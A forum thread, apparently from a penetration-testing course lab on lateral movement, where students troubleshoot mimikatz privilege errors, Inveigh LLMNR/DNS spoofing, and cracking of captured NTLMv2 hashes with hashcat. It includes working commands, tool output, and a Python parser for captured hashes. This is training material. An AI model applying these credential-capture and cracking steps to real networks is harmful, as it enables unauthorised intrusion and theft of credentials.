Attacking Enterprise Networks - Lateral Movement

Hi, on the MS01 machine I added ilfserveradm to the local administrators group, but I am unable to get “privilege::debug” to return “OK” with mimikatz.

This is the error I get:

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM


mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz #

Any suggestion? Thank you!

Did you solve it? I am stuck at the same place.

Didn't work for me either, but

try using netcat with the .bat file

it will work :slight_smile:

If anyone else has the same issue, you need to log out and then back in.

1 Like

I am performing all the steps mentioned to add ilfserveradm to the administrators group, but it is not working. Can someone please help?

Hey guys, I got the admin and everything, but I'm stuck on the last flag. I imported Inveigh, but when I execute it I keep getting the following error:

PS C:\tmp\Inveigh> Import-Module .\Inveigh.ps1
Import-Module .\Inveigh.ps1
PS C:\tmp\Inveigh> Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
[*] Inveigh 1.506 started at 2023-06-08T03:45:44
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 172.16.8.50
[+] Spoofer IP Address = 172.16.8.50
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer = Disabled
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Capture = Disabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Full
[+] File Output = Enabled
[+] Output Directory = C:\tmp\Inveigh
WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
Cannot see if a key has been pressed when either application does not have a console or when console input has been 
redirected from a file. Try Console.In.Peek.
At C:\tmp\Inveigh\Inveigh.ps1:6365 char:20
+                 if([Console]::KeyAvailable)
+                    ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (:) [], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException
 

I looked for what causes the issue but I can't find anything helpful.

The changes have to be applied to the system, maybe try a command like “gpupdate” :wink:

2 Likes

Could anyone please provide a hint on cracking the NTLMv2 hash (last question)? I am stuck and clearly missing something obvious.

Sure, so copy over Inveigh using: copy \\TSCLIENT\home\Inveigh.ps1
Next import the module: Import-Module Inveigh.ps1
Run Inveigh with: Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Wait until a hash pops up.
You can copy the hash.
You can run the following to find the right hash mode: hashcat --help | grep NTLM
You should use 5600, so your command can basically be the following:
hashcat -m 5600 "paste hash here" /usr/share/wordlists/rockyou.txt
You'll get the password.
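Before spending hours on a hash that hashcat reports as exhausted, it helps to check that the captured line really has the mode-5600 shape and to see what the NTLMv2 blob carries (a timestamp and the target's host and domain names). The following is an added example, not code from this thread, Inveigh or hashcat; the user, domain and host names, the challenges and the all-zero NTProofStr in the sample line are constructed placeholders.

```python
# Added example (not Inveigh's or hashcat's code): parse a hashcat mode-5600 line
# (USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB) and decode the blob per MS-NLMP.
import struct
from datetime import datetime, timedelta, timezone

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp", 9: "TargetName"}

def parse_netntlmv2(line: str) -> dict:
    """Check the field lengths hashcat expects, then decode the NTLMv2 blob."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "" or len(parts[3]) != 16 or len(parts[4]) != 32:
        raise ValueError("expected user::domain:<16 hex>:<32 hex>:<blob hex>")
    user, _, domain, challenge, proof, blob_hex = parts
    blob = bytes.fromhex(blob_hex)                      # raises on non-hex input
    if blob[:2] != b"\x01\x01":
        raise ValueError("blob lacks the NTLMv2 RespType/HiRespType signature 0x0101")
    filetime = struct.unpack_from("<Q", blob, 8)[0]     # bytes 8..15, after 6 reserved
    client_challenge = blob[16:24].hex()                # bytes 16..23, then 4 reserved
    av_pairs, pos = {}, 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                                  # MsvAvEOL ends the list
            break
        value, pos = blob[pos:pos + av_len], pos + av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")      # ids 1-5 and 9 are UTF-16LE strings
        av_pairs[name] = value.decode("utf-16-le") if av_id in (1, 2, 3, 4, 5, 9) else value.hex()
    when = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)
    return {"user": user, "domain": domain, "server_challenge": challenge, "ntproofstr": proof,
            "timestamp": when, "client_challenge": client_challenge, "av_pairs": av_pairs}

def is_valid_netntlmv2(line: str) -> bool:
    try:
        parse_netntlmv2(line)
        return True
    except ValueError:
        return False

def build_sample_line() -> str:
    """Constructed sample, not a real capture: placeholder names, dummy NTProofStr."""
    when = datetime(2023, 6, 8, 3, 45, 44, tzinfo=timezone.utc)
    filetime = (int(when.timestamp()) + 11644473600) * 10_000_000   # Unix -> FILETIME
    def av(av_id: int, text: str) -> bytes:
        data = text.encode("utf-16-le")
        return struct.pack("<HH", av_id, len(data)) + data
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + bytes.fromhex("0123456789abcdef") + b"\x00" * 4
            + av(2, "EXAMPLE") + av(1, "MS01") + av(4, "example.test")
            + struct.pack("<HH", 0, 0) + b"\x00" * 4)
    return f"ilfserveradm::EXAMPLE:1122334455667788:{'0' * 32}:{blob.hex()}"
```

A line that fails `is_valid_netntlmv2` was copied incompletely or is not a NetNTLMv2 response at all, which is one cause of hashcat finishing as exhausted.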

Hashcat constantly says “Exhausted”, do I have the wrong hash?

Nevermind, I in fact really had the wrong hash :confused:

All good I’ve done that countless times haha

1 Like

Can't seem to do the privilege escalation. Tried adding the user to the administrators group and also with nc.exe; if anyone can help I would appreciate a DM!

Solved

Hi, I can't connect to backupadm.

If anyone has trouble with this in future, start a cmd prompt as admin, then when you come to put in the username use .\ilfserveradm → this uses local authentication, as we're local admin. We don't want to authenticate against the domain :slight_smile:

6 Likes

Great advice: the .\ before the username will make it sign in with the local admin account instead of the domain one.

Also, make sure you run mimikatz from an elevated cmd line. That stumped me for a while too.

1 Like

How did you get it to work? I'm stuck, please help, someone.

For anyone with the mimikatz problem: when we get admin privileges we need to log out and reconnect to the RDP session, then we can run PowerShell as admin without a password.